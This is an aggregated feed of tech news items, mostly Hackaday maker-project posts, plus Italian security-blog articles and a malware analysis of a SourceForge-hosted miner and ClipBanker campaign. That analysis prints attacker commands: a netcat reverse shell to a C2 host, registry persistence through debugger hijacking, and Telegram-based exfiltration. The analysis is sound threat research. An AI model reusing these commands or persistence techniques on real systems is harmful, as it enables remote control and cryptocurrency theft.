Of all the awesome projects I saw during the Faire, the one that stuck with me the most has to be Brett Houser’s Wasteworld Toys. This incredible collection of hand-made remote controlled vehicles invoke the look and feel of the Mad Max universe, but are populated with its own cast of post-apocalyptic characters that come from the depths of Brett’s obviously considerable imagination.

Whether your saw them as pieces of art or electronic marvels, it was impossible not to be impressed with the work Brett put into these builds. While there were some 3D printed parts and cannibalized model kits, much of the raw material used to build the vehicles and characters came from the trash. Brett has an eye for repurposing everyday objects, like taking the metal top from a disposable lighter and turning it into an armored faceplate for one of his Wasteworld warriors.

Beyond being able to simply drive them around, most of the vehicles had some secondary function. One was equipped with an Airsoft cannon, another had a functional flame-thrower, and there was even a mobile rocket launcher that actually fired tiny rockets. They weren’t all weapons of war though: there was a surveillance van that featured a tiny display showing nearby WiFi networks, and a tricked-out station wagon that had an emulated version of Contra running in the back that you could play with a Bluetooth PlayStation controller.

Many of the vehicles featured first person view (FPV) capabilities, with the cameras so expertly hidden on the vehicles and cybernetic characters that at first glance you assume they’re just part of the visual theme and not functional components. To make the experience even more immersive, several vehicles featured displays that were really only visible when looking through the FPV gear, such as digital readouts of the system’s battery voltage.

As impressive as the vehicles of Wasteworld Toys was, it was perhaps Brett himself who left the biggest impression on me. Humble, affable, and eager to share the intricate details of his work, he was even willing to hand the controls of his creations over to attendees, much to their delight. The Wasteworld couldn’t have asked for a better ambassador.

Myelin BCI Board

Hackaday readers may recall the OpenBCI project, which made some headlines about a decade ago with their relatively low-cost development boards for experimenting with brain-computer interfaces (BCIs). We covered a few projects that used their software and hardware, including a flying shark controlled by EEG signals.

It turns out that OpenBCI has now turned their attention to some kind of mixed reality headset that costs as much as a new car, leaving the future of their more hobbyist friendly hardware in question. Which is why Mike Recine has been working on the Myelin, an open source hardware project that continues the legacy of OpenBCI’s early work. Powered by the ESP32, the battery-powered board can wirelessly link to your phone or computer to deliver 16 channels of EEG data.

Mike is hoping to launch a Kickstarter for the hardware soon, offering up assembled and ready-to-use Myelin boards. Kits are also on the horizon, and of course as an open source hardware project, spinning up your own board will be an option as well. The project doesn’t have much of an online presence currently, but interested parties can sign up to be notified when more information goes live.

A Cardboard Table Saw

The ChompSaw is advertised as a “kid-safe power tool for cutting cardboard” but it doesn’t take long to realize that’s selling the machine a bit short. There’s no blade in the machine, instead it uses a small metal piston to rapidly nibble away at the cardboard, a mechanism that co-founder Max Liechty says could be thought of as a “full-auto hole punch.” Even though there’s no blade, the business end of the ChompSaw is still under a protective cover that keeps anything thicker than 3 mm cardboard out. You couldn’t hurt yourself with this machine if you tried.

It rapidly rips through cardboard in any direction, making it easy to follow patterns and cut out complex shapes. Though it was designed primarily for common cardboard (think: all those Amazon boxes you’ve got stacked up), it can chew through other thin materials such as paper, foam, and plastic, opening up even more possibilities.

hackaday.com/wp-content/upload…

The ChompSaw brought in over $1 million during its 2023 Kickstarter campaign, and is available for purchase through their site. While it might not seem like the kind of machine we’d usually get excited about at Hackaday, its ability to cut through foam and other materials holds promise for more practical applications than rainy day arts and crafts. Plus, one should never underestimate the value of CAD: Cardboard Aided Design.

The Sights of Philly Maker Faire

The Road Ahead

In addition to the attendees and exhibitors, I also got the chance to talk to some of the folks behind the Philadelphia Maker Faire. It will probably come as no surprise to hear they all share a passion for discovering and showcasing local talent, and are very excited about the future of the event. There was even some talk about coordinating efforts with other art and tech events in the area such as JawnCon.

Considering they were up against some dreary weather, the organizers were encouraged by the fantastic turnout. Similarly, the venue itself was more than up to the challenge, and should have no trouble supporting the event as it grows. Put simply, the Philadelphia Maker Faire has found its stride, and promises to be even bigger and better next year. If you’re in the Northeast US, this is an event you should keep on your calendar for 2026 and beyond.

Un piccolo ufficio postale nello stato del Kentucky (USA) è diventato il punto di partenza di una delle più grandi operazioni segrete dell’FBI degli ultimi anni. Il 17 settembre 2021, una scatola conteneva quello che sembrava un normale pacco di libri per bambini, ma all’interno del libro c’erano buste contenenti migliaia di dollari in contanti.

Il denaro proveniva da una persona nota come ElonmuskWHM, uno dei principali riciclatori di denaro del darknet che lavorava sulla piattaforma White House Market. I suoi servizi venivano utilizzati da criminali che volevano incassare criptovalute senza passare attraverso piattaforme legali che richiedevano la verifica dell’identità. L’FBI decise non solo di catturarlo, ma anche di impossessarsi dei suoi affari, diventando così la “cassa” del mondo criminale.

Dietro ElonmuskWHM si celava il cittadino indiano trentenne, Anurag Pramod Murarka, che è stato attirato negli Stati Uniti tramite un visto approvato e arrestato all’aeroporto. E poi, per quasi un anno, gli agenti dell’FBI continuarono a condurre affari a suo nome. I clienti non avevano idea che stavano trasferendo criptovalute e ricevendo denaro in cambio di servizi organizzati dall’agenzia di intelligence, che registrava tutto, dagli indirizzi ai collegamenti con altri criminali.

L’operazione ha portato alla scoperta di spacciatori di droga a Miami, rapine a mano armata a San Francisco e hacker criminali, dietro gli attacchi multimilionari. Sotto le mentite spoglie di un ufficio di cambio, gli agenti hanno fatto molto più che limitarsi a osservare: hanno anche fornito denaro agli hacker affinché si rivelassero.

Uno di questi casi riguarda Remington Ogletree. Durante le indagini, ordinò 75.000 dollari tramite Telegram, senza sapere che lo “scambiatore” era già controllato dall’FBI. Il denaro gli è stato inviato con un numero di tracciamento USPS, che ha permesso di stabilire nuovi dettagli sulle sue attività. Ogletree venne successivamente arrestato, ma continuò a lavorare per quasi un anno, ignaro di essere sorvegliato.

Per raggiungere Murarka, gli agenti hanno analizzato la blockchain, cercato corrispondenze nelle domande di visto e utilizzato metodi più controversi. Ad esempio, l’FBI ha chiesto a Google i dati di tutti gli utenti che hanno guardato video di YouTube inviati a un sospettato tramite messaggio di testo, una mossa che ha suscitato critiche per la potenziale violazione dei diritti costituzionali.

Inoltre, gli agenti hanno rintracciato i mittenti del denaro a New York. Uno di loro, nome in codice “Eric“, divenne un informatore dell’FBI. Ha continuato a trasportare denaro contante sotto copertura, utilizzando una telecamera nascosta nel corpo, contribuendo così a identificare i partecipanti al raggiro. Da febbraio a settembre, Eric ha effettuato circa 80 consegne per un valore di oltre 15 milioni di dollari, raccogliendo nuove prove. Il denaro veniva trasportato attraverso negozi, parcheggi e ristoranti, da dove i muli viaggiavano attraverso gli stati.

Videoclip dalla telecamera dell’informatore (404 Media)

Dei documenti relativi a questi episodi non erano sempre collegati a ElonmuskWHM, ma i dettagli (numeri di telefono, date e metodi di azione) erano coerenti. Gli inquirenti ritengono che Murarka abbia integrato il suo piano in un antico sistema di trasferimento di denaro noto come hawala o angadia, adattandolo però alla criptovaluta.

In precedenza Murarka aveva diretto un’azienda di geoinformazione e aveva addirittura inviato agli agenti video su YouTube del suo precedente impiego, ignaro del fatto che ogni suo clic veniva tracciato. Gli investigatori hanno confermato la sua identità basandosi sui dati di Google, Uber, Binance e Apple.

Video di YouTube inviati ai clienti. Ogni video è stato visualizzato rispettivamente circa 2.000 e 1.400 volte (404 Media)

Nel gennaio 2025, il tribunale ha condannato Murarku è stato condannato a 121 mesi (10 anni e 1 mese) di reclusione. Gli inquirenti hanno affermato che Murarka ha fondato uno dei più grandi exchange di criptovalute al mondo, incassando più di 24 milioni di dollari in meno di due anni. Il portavoce dell’FBI ha aggiunto che l’agenzia utilizzerà tutti i mezzi necessari per denunciare le reti criminali, anche se ciò significa riciclare denaro.

L'articolo Il Piccolo Ufficio Postale ha Fregato Mezza Internet! L’operazione sotto copertura dell’FBI proviene da il blog della sicurezza informatica.

Underwater robots face many challenges, not least of which is how to move around. ZodiAq is a prototype underwater soft robot (link is to research paper) that takes an unusual approach to this problem: multiple flexible appendages. The result is a pretty unconventional-looking device that can not only get around effectively, but can do so without disturbing marine life.

ZodiAq sports a soft flexible appendage from each of its twelve faces, but they aren’t articulated like you might think. Despite this, the device can crawl and swim.
With movement inspired by bacterial flagella, ZodiAq moves in an unusual but highly controllable way.
Each soft appendage is connected to a motor, which rotates the attached appendage. This low-frequency but high-torque rotation, combined with the fact that each appendage has a 45° bend to it, has each acting as a rotor. Rotation of the appendages acts on the surrounding fluid, generating thrust. When used together in the right way, these appendages allow the unit to move in a perfectly controllable manner.

This locomotion method is directly inspired by the swimming gait of bacterial flagella (which the paper mentions are regarded as the only example of a biological “wheel”.)

How fast can it go? The prototype covers a distance of two body lengths every fifteen seconds. True, it’s no speed demon compared to a propeller, but it doesn’t disturb marine life or environments as it moves around. This method of movement has a lot going for it. It’s adaptable and doesn’t use all twelve appendages at once; so there’s redundancy built in. If some get damaged or go missing, it can still move, just slower.

ZodiAq‘s design strikes us as a very accessible concept, should any aspiring marine robot hackers wish to give it a shot. We’ve seen other highly innovative and beautiful underwater designs as well, like body-length undulating fins and articulated soft arms.

We do notice that since it lacks a “front” — it might be a challenge to decide how to mount something like a camera. If you have any ideas, share them in the comments.

hackaday.com/2025/04/09/forget…

Sitting in front of a computer all day isn’t exactly what the firmware between our ears was tuned to do. We’re supposed to be hunting and gathering, not hunting and pecking. So anything that makes the computing experience a little more pleasurable is probably worth the effort, and this premium wireless scroll wheel certainly seems to fit that bill.

If this input device seems familiar, that’s because we featured [Engineer Bo]’s first take on this back at the end of 2024. That version took a lot of work to get right, and while it delivered high-resolution scrolling with a premium look and feel, [Bo] just wasn’t quite satisfied with the results. There were also a few minor quibbles, such as making the power switch a little more user-friendly and optimizing battery life, but the main problem was the one that we admit would have driven us crazy, too: the wobbling scroll wheel.

[Bo]’s first approach to the wobble problem was to fit a larger diameter bearing under the scroll wheel. That worked, but at the expense of eliminating the satisfying fidget-spinner action of the original — not acceptable. Different bearings yielded the same result until [Bo] hit on the perfect solution: a large-diameter ceramic bearing that eliminated the wobble while delivering the tactile flywheel experience.

The larger bearing left more room inside for the redesigned PCB and a lower-profile, machined aluminum wheel. [Bo] also had a polycarbonate wheel made, which looks great as is but would really be cool with internal LEDs — at the cost of battery life, of course. He’s also got plans for a wheel machined from wood, which we’ll eagerly await.

youtube.com/embed/tzqJ1rJURgs?…

hackaday.com/2025/04/09/better…

If you want to get started in microfluidic robotics, [soiboi soft’s] salamander is probably too complex for a first project. But it is impressive, and we bet you’ll learn something about making this kind of robot in the video below.

The pneumatic muscles are very impressive. They have eight possible positions using three sources of pressure. This seems like one of those things that would have been nearly impossible to fabricate in a home lab a few decades ago and now seems almost trivial. Well, maybe trivial isn’t the right word, but you know what we mean.

The soft robots use layers of microfluidic channels that can be made with a 3D printer. Watching these squishy muscles move in an organic way is fascinating. For right now, the little salamander-like ‘bot has a leash of tubes, but [soiboi] plans to make a self-contained version at some point.

If you want something modular, we’ve seen Lego-like microfluidic blocks. Or, grab the shrinky dinks.

youtube.com/embed/EeIvIABVTJg?…

hackaday.com/2025/04/08/salama…

An electric typewriter is a rare and wonderful thrift store find, and even better if it still works. Unfortunately, there’s not as much use for these electromechanical beauties, so if you find one, why not follow [Konstantin Schauwecker]’s lead and turn it into a printer?

The portable typewriter [Konstantin] found, a Silver Reed 2200 CR, looks like a model from the early 1980s, just before PCs and word processing software would sound the death knell for typewriters. This machine has short-throw mechanical keys, meaning that a physical press of each key would be needed rather than electrically shorting contacts. Cue the order for 50 low-voltage solenoids, which are arranged in rows using 3D printed holders and aluminum brackets, which serve as heat sinks to keep the coils cool. The solenoids are organized into a matrix with MOSFET drivers for the rows and columns, with snubber diodes to prevent voltage spikes across the coils, of course. A Raspberry Pi takes care of translating an input PDF file into text and sending the right combination of GPIO signals to press each key.

The action of the space bar is a little unreliable, so page formatting can be a bit off, but other than that, the results are pretty good. [Konstantin] even managed to hook the printer up to his typewriter keyboard, which is pretty cool, too.

youtube.com/embed/S7u7vYrCcSE?…

hackaday.com/2025/04/08/dozens…

IBM mainframes are known for very unusual terminals. But IBM made many different things, including the IBM 3151 ASCII terminal, which uses a cartridge to emulate a VT220 terminal. [Norbert Keher] has one and explains in great detail how to connect it to a mainframe.

It had the 3151 personality cartridge for emulating multiple IBM and DEC terminals. However, the terminal would not start until he unplugged it. The old CRT was burned in with messages from an IBM 3745, which helped him work out some of the configuration.

If you’ve only used modern ASCII terminals, you might not realize that many terminals from IBM and other vendors used to use a block mode where the computer would dump a screen to the terminal. You could “edit” the screen (that is, fill in forms or enter lines). Then you’d send the whole screen back in one swoop. This is “block” mode, and some of the terminals the 3151 can emulate are character mode, and others are block mode, which explains its odd keyboard and commands.

[Norbert] gets the terminal running with a virtual mainframe, but along the way, he explains a lot about what’s going on. The video is about an hour long, but it is an hour well spent if you are interested in mainframe history.

Of course, you can always get the real deal to connect. If you don’t have your own virtual mainframe, you are missing out.

youtube.com/embed/V14ac9cRi9Q?…

hackaday.com/2025/04/08/ascii-…

Many years ago, audio equipment came with a tone control, a simple RC filter that would cut or boost the bass to taste. As time passed, this was split into two controls for bass and treble, and then finally into three for bass, mid, and treble. When audiophile fashion shifted towards graphic equalisers, these tone controls were rebranded as “3-band graphic equalisers”, a misleading term if ever we heard one. [Gabriel Dantas] designed one of these circuits, and unlike the simple passive networks found on cheap music centres of old, he’s doing a proper job with active filters.

The write-up is worth a read even if you are not in the market for a fancy tone control, for the basic primer it gives on designing an audio filter. The design contains, as you might expect, a low-pass, a bandpass, and a high-pass filter. These are built around TL072 FET-input op-amps, and an LM386 output stage is added to drive headphones.

The final project is built on a home-made PCB, complete with mains power supply. Audiophiles might demand more exotic parts, but we’re guessing that even with these proletarian components it will still sound pretty good. Probably better than the headphone amplifier featured in a recent project from a Hackaday writer, at least. There’s a build video, below the break.

youtube.com/embed/bzCQj5K0yOU?…

hackaday.com/2025/04/08/design…

Even if you aren’t a Disney fan, you probably know about EPCOT — Experimental Prototype Community of Tomorrow — a Disney attraction that promised a glimpse of the future. [ErnieTech] takes a glimpse at the UNIVAC computer that ran the operation in the 1980s. A lot of schools had UNIVAC 1100-series computers back in those days, so while you don’t hear as much about them as, say, IBM 360s, there are hordes of people who have used the 1100s, even if they don’t remember it.

EPCOT opened in 1982, and it not only ran the attraction but was also visible as part of the exhibit’s ambiance. They even used the Pepper’s Ghost illusion to superimpose a little man on top of the equipment.

Sperry used the relationship with Disney for promotional purposes. We’ve never found a good emulator for the 1100s. The UNIVAC had a 36-bit word and 6-bit characters. We’d love to see something like Hercules that could support Exec 8.

The UNIVAC originated with the Remington Rand company, which had bought Eckert-Mauchly Computer Corporation. Remington Rand later merged with the Sperry Corporation to become Sperry Rand. Eventually, the company reverted to the Sperry name before merging with Burroughs in 1986 to form UNISYS — a company that still exists today.

youtube.com/embed/fd7IiBOIwDM?…

hackaday.com/2025/04/08/the-co…

Even in 2025 there are still many applications for a simple Disk Operating System (DOS), whether this includes running legacy software (including MS-DOS games & Windows 3.x), or (embedded) systems running new software where the overhead of a full-fat Linux or BSD installation would be patently ridiculous.

This is where the FreeDOS project provides a modern, fully supported DOS, with the recent 1.4 release adding a whole range of features and updates to existing components like the FreeCOM command shell. This is the first stable release since 1.3 was released in 2022.

FreeDOS saw its first release in 1994 and has become the de facto replacement for MS-DOS — featuring many improvements to make it work well on modern hardware and a package manager to manage installed software much like on Linux & BSD. The new kernel didn’t quite make it into this release, but it and some other items will be available in the monthly test builds.

You can download the new 1.4 release here, with live & installer CD images, a USB installer and even a Floppy Edition available. System requirements include an (Intel) x86 CPU, a BIOS (or legacy UEFI mode), 640 kB of RAM and 20 MB of storage.

hackaday.com/2025/04/08/freedo…

[David] sent us a tip about a company in Belgium, Citronics, that is looking to turn old cellphones into single-board computers for embedded Linux applications. We think it’s a great idea, and have long lamented how many pocket supercomputers simply get tossed in the recycling stream, when they could be put to use in hacker projects. So far, it looks like Citronics only has a prototyping breakout board for the Fairphone 2, but it’s a promising idea.

One of the things that’s stopping us from re-using old phones, of course, is the lack of easy access to the peripherals. On the average phone, you’ve got one USB port and that’s it. The Citronics dev provides all sorts of connectivity: 4x USB 2.0, 1x Ethernet 10/100M, and a Raspberry Pi Header (UART, SPI, I2C, GPIO). At the same time, for better or worse, they’ve done away with the screen and its touch interface, and the camera too, but they seem to be keeping all of the RF capabilities.

The whole thing runs Linux, which means that this won’t work with every phone out there, but projects like PostmarketOS and others will certainly broaden the range of usable devices. And stripping off the camera and screen has the secondary advantages of removing the parts that get most easily broken and have the least support from custom Linux distros.

We wish we had more details about the specifics of the break-out boards, but we like the idea. How long before we see an open-source implementation of something similar? There are so many cheap used and broken cellphones out there that it’s certainly a worthwhile project!

hackaday.com/2025/04/08/turnin…

We know you’ve seen them: the time-lapses that show a 3D print coming together layer-by-layer without the extruder taking up half the frame. It takes a little extra work compared to just pointing a camera at the build plate, but it’s worth it to see your prints materialize like magic.

Usually these are done with a plugin for OctoPrint, but with all due respect to that phenomenal project, it’s a lot to get set up if you just want to take some pretty pictures. Which is why [Whopper Printing] put together the LayerLapse. This small PCB is designed to trigger your DSLR or mirrorless camera once its remotely-mounted hall effect sensor detects the presence of a magnet.
The remote hall effect sensor.
The idea is that you just need to stick a small magnet to your extruder, add a bit of extra G-code that will park it over the sensor at the end of each layer, and you’re good to go. There’s even a spare GPIO pin broken out should you want to trigger something else on each layer of your print. Admittedly we can’t think of anything else right now that would make sense, other than some other type of camera, but we’re sure some creative folks out there could put this feature to use.

Currently, [Whopper Printing] is selling the LayerLapse as a finished product, though it does sound like a kit version is in the works. There’s also instructions for building a DIY version of the hardware using your microcontroller of choice. Whether you buy or build the hardware, the firmware is available under the MIT license for your tinkering pleasure.

Being hardware hackers, we appreciate the stand-alone nature of this solution. But if you’re already controlling your printer through OctoPrint, you’re probably better off just setting up one of the available time-lapse plugins.

hackaday.com/2025/04/08/layerl…

Recently, we noticed a rather unique scheme for distributing malware that exploits SourceForge, a popular website providing software hosting, comparison, and distribution services. The site hosts numerous software projects, and anyone can upload theirs. One such project, officepackage, on the main website sourceforge.net, appears harmless enough, containing Microsoft Office add-ins copied from a legitimate GitHub project. The description and contents of officepackage provided below were also taken from GitHub.

Description of the “officepackage” project

Few know that projects created on sourceforge.net get a sourceforge.io domain name and web hosting services. Pages like that are well-indexed by search engines and appear in their search results.

Example of a search query and results containing officepackage.sourceforge.io

The project under investigation has been assigned the domain officepackage.sourceforge[.]io, but the page displayed when you go to that domain looks nothing like officepackage on sourceforge.net. Instead of the description copied from GitHub, the visitor is presented with an imposing list of office applications complete with version numbers and “Download” buttons.

The project as seen on the officepackage.sourcefoge.io domain

Hovering over one of the buttons reveals a seemingly legit URL in the browser status bar: https[:]//loading.sourceforge[.]io/download. It is easy to make the mistake of associating that URL with officepackage, as the buttons are on that project’s page. However, the loading.sourceforge.io domain suggests a different project on sourceforge.net, named loading.

URL associated with the “Download” button

Clicking the link redirects to a page with yet another “Download” button, this time in English.

Page for downloading the suspicious archive

Clicking that button finally downloads a roughly seven-megabyte archive named vinstaller.zip. This raises some red flags, as office applications are never that small, even when compressed.

The infection chain: from searching for office software to downloading an installer

The downloaded archive contains another password-protected archive, installer.zip, and a Readme.txt file with the password.

Contents of vinstaller.zip

Inside installer.zip is a file named installer.msi. This is a Windows Installer file that exceeds 700 megabytes. Apparently, the large size is intended to convince users they are looking at a genuine software installer. Attackers use the file pumping technique to inflate the file size by appending junk data. The file in question was padded with null bytes. After we stripped the junk bytes, its true size was 7 megabytes.

Contents of installer.zip

Running the installer creates several files, with two being of interest to us: UnRAR.exe (a console archive utility) and a password-protected archive named 51654.rar. The installer then executes an embedded Visual Basic script. Attackers have long distributed password-protected archives along with unpacking utilities, passing the password via the command line. However, this case has an intermediary step. The installer files lack an archive password. Instead, to continue the infection chain, the VB script runs a PowerShell interpreter to download and execute a batch file, confvk, from GitHub. This file contains the password for the RAR archive. It also unpacks malicious files and runs the next-stage script.

The infection chain: from launching the installer to downloading the confvk batch script

Here is a breakdown of how the batch script works. First, it checks for an existing infection by searching for the AutoIt interpreter at a specific path. If AutoIt is found, the script deletes itself and exits. If not, the script checks for processes associated with antivirus software, security solutions, virtual environments, and research tools. If it detects anything like that, it deletes itself.

If both checks pass, the script unpacks the RAR archive and runs two PowerShell scripts within its code.
"%ProgramData%\dist\UnRAR.exe" x -y -p147852369 "%ProgramData%\dist\51654.rar" "%ProgramData%\dist\"

Command to unpack the RAR archive executed by the batch file

One of the PowerShell scripts sends a message to a certain chat using the Telegram API. The message contains system information, the infected device’s external IP address and country, CPU name, operating system, installed antivirus, username, and computer name.

Code snippet from confvk with commands to unpack the malicious archive and run the Telegram file-sending script

The other PowerShell script downloads another batch file, confvz, to process the files that were extracted from the RAR archive.

Contents of the RAR archive

The contents of the archive can be seen in the screenshot above. Below is a summary of each file.

The confvz batch file creates three subdirectories at %ProgramData% and moves the unpacked archive files into those. The first subdirectory receives Input.exe and Icon.dll, the second gets another Input.exe copy with Kape.dll, and the third gets all netcat files. The batch file then creates ini.cmd and init.cmd batch scripts at %USERPROFILE%\Cookies\ to run the files it copied. These scripts execute Input.exe (the AutoIt interpreter), passing the paths to Icon.dll and Kape.dll (both containing compressed AutoIt scripts) as arguments.

Contents of the confvz batch file

Next, confvz generates keys in the registry key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\*. These link to the ini.cmd and init.cmd batch files. The keys allow running files using shortened names. For example, the registry key
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\install.exe"::"%USERPROFILE%\Cookies\ini.cmd
launches ini.cmd when running install.exe. Similarly, start.exe is registered as a link to init.exe, and Setup.exe links to the system utility %WINDIR%\System32\oobe\Setup.exe, normally launched during OS installation. We will revisit this utility later.

Then confvz creates services named NetworkConfiguration and PerformanceMonitor to autostart the batch files, and a service named Update to directly run the AutoIt interpreter without intermediate batch files.

Additionally, as a backup autostart method, confvz adds this registry key:
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\MicrosoftEdgeUpdate.exe"::Debugger="%WINDIR%\System32\cmd.exe /c start start.exe"
This runs a debugger when MicrosoftEdgeUpdate.exe is started. The debugger is set to execute start.exe, which, based on the earlier registry keys, points to init.cmd.

Using the built-in WMIC utility, an event filter is created to trigger a handler every 80 seconds. While disabled by default in more recent Windows versions, WMIC still functions in older systems.

The handler executes the following command:
ShellExperienceHost.exe --ssl apap.app 445 -e cmd.exe
ShellExperienceHost.exe is the netcat executable from the malicious archive. The arguments above make the utility establish an encrypted connection with the C2 server apap[.]app on port 445 and launch a command-line interpreter with redirected input/output through that connection. This essentially creates a remote command line with apap[.]app:445 as the C2 server.

Finally, confvz creates a file:
%WINDIR%\Setup\Scripts\ErrorHandler.cmd
This is a custom script you can build in Windows to streamline troubleshooting during OS installation. If a critical error occurs, the %System32%\oobe\Setup.exe utility finds and executes this file. However, the attackers have found a way to exploit it for automatic startup. They achieve this by again using the operating system’s built-in WMIC utility to establish an event filter that triggers the handler every 300 seconds. The handler is specified as %WINDIR%\System32\cmd.exe /c start Setup.exe, while Setup.exe, according to the registry keys created earlier, references the utility %WINDIR%\System32\oobe\Setup.exe, which executes ErrorHandler.cmd upon launch. The ErrorHandler.cmd file contains a short PowerShell script that uses the Telegram API to retrieve and execute a text string. This is another remote command line, but its output is not sent anywhere.

The infection chain: from executing confvk to setting up all the auto-start methods

The key malicious actions in this campaign boil down to running two AutoIt scripts. Icon.dll restarts the AutoIt interpreter and injects a miner into it, while Kape.dll does the same but injects ClipBanker. ClipBanker is a malware family that replaces cryptocurrency wallet addresses in the clipboard with the attackers’ own. Users of crypto wallets typically copy addresses instead of typing them. If the device is infected with ClipBanker, the victim’s money will end up somewhere entirely unexpected.

Victims

The officepackage.sourceforge[.]io site has a Russian interface, suggesting a focus on Russian-speaking users. Our telemetry indicates that 90% of potential victims are in Russia, where 4,604 users encountered the scheme between early January and late March.

Takeaways

Distributing malware disguised as pirated software is anything but new. As users seek ways to download applications outside official sources, attackers offer their own. They keep looking for new ways to make their websites look legit. The scheme described here exploits SourceForge feature of creating a sourceforge.io subdomain for each sourceforge.net repository.

The persistence methods are worthy of note as well. Attackers secure access to an infected system through multiple methods, including unconventional ones. While the attack primarily targets cryptocurrency by deploying a miner and ClipBanker, the attackers could sell system access to more dangerous actors.

We advise users against downloading software from untrusted sources. If you are unable to obtain some software from official sources for any reason, remember that seeking alternative download options always carries higher security risks.

securelist.com/miner-clipbanke…

[JesseDarr] recently wrote in to tell us about their dynamic Arm for Robitc Mischief (dARM), a mostly 3D printed six degrees of freedom (6DOF) robotic arm that’s designed to be stronger and more capable than what we’ve seen so far from the DIY community.

The secret? Rather than using servos, dARM uses brushless DC (BLDC) motors paired with ODrive S1 controllers. He credits [James Bruton] and [Skyentific] (two names which regular Hackaday readers are likely familiar with) for introducing him to not only the ODrive controllers, but the robotics applications for BLDCs in the first place.

dARM uses eight ODrive controllers on a CAN bus, which ultimately connect up to a Raspberry Pi 4B with a RS485 CAN Hat. The controllers are connected to each other in a daisy chain using basic twisted pair wire, which simplifies the construction and maintenance of the modular arm.

As for the motors themselves, the arm uses three different types depending on where they are located, with three Eaglepower 8308 units for primary actuators, a pair of GB36-2 motors in the forearm, and finally a GM5208-24 for the gripper. Together, [JesseDarr] says the motors and gearboxes are strong enough to lift a 5 pound (2.2 kilogram) payload when extended in a horizontal position.

The project’s documentation includes assembly instructions for the printed parts, a complete Bill of Materials, and guidance on how to get the software environment setup on the Raspberry Pi. It’s not exactly a step-by-step manual, but it looks like there’s more than enough information here for anyone who’s serious about building a dARM for themselves.

If you’d like to start off by putting together something a bit easier, we’ve seen considerably less intimidating robotic arms that you might be interested in.

youtube.com/embed/Pv4tDsQZbRw?…

hackaday.com/2025/04/08/printe…

Il Google Threat Intelligence Group (GTIG) ha identificato una nuova ondata di attacchi informatici attribuendola a un gruppo denominato UNC5837.

La campagna, osservata a partire da ottobre 2024, adotta un approccio unico: l’invio di e-mail di phishing contenenti allegati in formato .rdp. Questi file, una volta aperti, avviano una connessione RDP dalla macchina della vittima a un server controllato dagli aggressori, senza mostrare i consueti banner di avviso per la sessione interattiva.

In questa sofisticata campagna di spionaggio, rivolta a istituzioni governative e militari europee, alcuni hacker ritenuti collegati ad attori statali russi hanno sfruttato una funzionalità meno nota del protocollo RDP (Remote Desktop Protocol) di Windows per infiltrarsi nei sistemi.

Le prove suggeriscono che questa campagna potrebbe aver comportato l’uso di uno strumento proxy RDP come PyRDP per automatizzare attività dannose come l’esfiltrazione di file e l’acquisizione degli appunti. Questa tecnica è stata precedentemente soprannominata “Rogue RDP”.
Esempio della campagna di phishing (fonte Google)
Le e-mail contenevano file .rdp firmati, con certificati SSL validi, per aggirare le misure di sicurezza che avrebbero avvisato gli utenti di potenziali rischi. Questi file sono configurati per mappare le risorse dal computer della vittima al server dell’attaccante.

La campagna ha probabilmente consentito agli aggressori di leggere le unità delle vittime, rubare file, catturare dati degli appunti (incluse le password) e ottenere variabili di ambiente delle vittime. Sebbene non abbiamo osservato l’esecuzione diretta di comandi sulle macchine delle vittime, gli aggressori potrebbero presentare applicazioni ingannevoli per phishing o ulteriori compromissioni.

L’obiettivo principale della campagna sembra essere lo spionaggio e il furto di file, sebbene la piena portata delle capacità dell’aggressore rimanga incerta. Questa campagna funge da duro promemoria dei rischi per la sicurezza associati alle oscure funzionalità RDP, sottolineando l’importanza della vigilanza e della difesa proattiva.

L'articolo RDP utilizzato dagli hacker russi per colpire le istituzioni governative e militari europee proviene da il blog della sicurezza informatica.

Should you travel around Europe, you may notice that things in France are ever so slightly different. Not necessarily better or worse, simply that the French prefer to plough their own furrow rather than importing cultural tends from their neighbors.

In the 1980s this was evident in their home computers, because as well as a Minitel terminal in your house, you could have an all-French machine plugged into your TV. [Retro Krazy] has just such a machine — it’s a Matra Hachette Alice 32, and its red plastic case hides hardware any of us would have been proud to own back in the day.

At first sight it appears superficially similar to a Sinclair Spectrum, with its BASIC keywords next to the keys. But under that slightly calculator style AZERTY keyboard is an entirely different architecture, a Motorola 6803. The first Alice computer was a clone of a Radio Shack model, and while this one has no compatibility with its predecessor it retains some silicon choices. On the back are a series of DIN sockets, one for a SCART adapter, and more for serial connectivity and a cassette deck. The overall impression is of a well-engineered machine, even if that red color is a little garish.

The Alice hasn’t appeared here on its own before, but we have taken a look at French retrocomputers here in the past.

youtube.com/embed/_Pr--TXhnX4?…

hackaday.com/2025/04/07/the-19…

We’ve seen tons of projects lately using the ESP32-C3, and for good reason. The microcontroller has a lot to offer, and the current crop of tiny dev boards sporting it make adding a lot of compute power to even the smallest projects dead easy. Not so nice, though, is the poor WiFi performance of some of these boards, which [Peter Neufeld] addresses with this quick and easy antenna.

There are currently a lot of variations of the ESP32-C3 out there, sometimes available for a buck a piece from the usual suspects. Designs vary, but a lot of them seem to sport a CA-C03 ceramic chip antenna at one end of the board to save space. Unfortunately, the lack of free space around the antenna makes for poor RF performance. [Peter]’s solution is a simple antenna made from a 31-mm length of silver wire. One end of the wire is formed into a loop by wrapping it around a 5-mm drill bit and bending it perpendicular to the remaining tail. The loop is then opened up a bit so it can bridge the length of the ceramic chip antenna and then soldered across it. That’s all it takes to vastly improve performance as measured by [Peter]’s custom RSSI logger — anywhere from 6 to 10 dBm better. You don’t even need to remove the OEM antenna.

The video below, by [Circuit Helper], picks up on [Peter]’s work and puts several antenna variants to further testing. He gets similarly dramatic results, with 20 dBm improvement in some cases. He does note that the size of the antenna can be a detriment to a project that needs a really compact MCU and tries coiling up the antenna, with limited success. He also did a little testing to come up with an optimal length of 34 mm for the main element of the antenna.

There seems to be a lot of room for experimentation here. We wonder how mounting the antenna with the loop perpendicular to the board and the main element sticking out lengthwise would work. We’d love to hear about your experiments, so make sure to ping us with your findings.

youtube.com/embed/UHTdhCrSA3g?…

hackaday.com/2025/04/07/simple…

The advantage of a radio-controlled clock that receives the time signal from WWVB is that you never have to set it again. Whether it’s a little digital job on your desk, or some big analog wall clock that’s hard to access, they’ll all adjust themselves as necessary to keep perfect time. But what if the receiver conks out on you?

